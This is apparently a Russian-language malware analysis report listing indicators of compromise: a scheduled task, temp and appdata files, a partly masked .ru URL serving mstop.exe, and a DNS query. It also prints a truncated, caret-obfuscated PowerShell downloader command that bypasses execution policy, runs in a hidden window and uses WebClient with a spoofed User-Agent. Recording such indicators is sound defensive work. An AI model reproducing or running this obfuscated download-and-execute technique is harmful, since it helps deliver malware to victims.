Техническая информация
- <SYSTEM32>\tasks\nvngxupdatecheckdaily_{693d7eba-7eba-7eba-7eba-693d7eba7eba}
- '<LS_APPDATA>\tempxgv49.jpg'
- <LS_APPDATA>\tempxgv49.jpg
- %TEMP%\6b79.tmp
- %APPDATA%\rjciujv
- %APPDATA%\edhvbag
- %APPDATA%\rjciujv
- %APPDATA%\edhvbag
- <LS_APPDATA>\tempxgv49.jpg
- http://an#####agazinchik.ru/poperclip/mstop.exe
- http://www.ms###csi.com/ncsi.txt
- DNS ASK an#####agazinchik.ru
- '<SYSTEM32>\cmd.exe' /c rDvLbCWaYNkGVHu & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c rDvLbCWaYNkGVHu & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....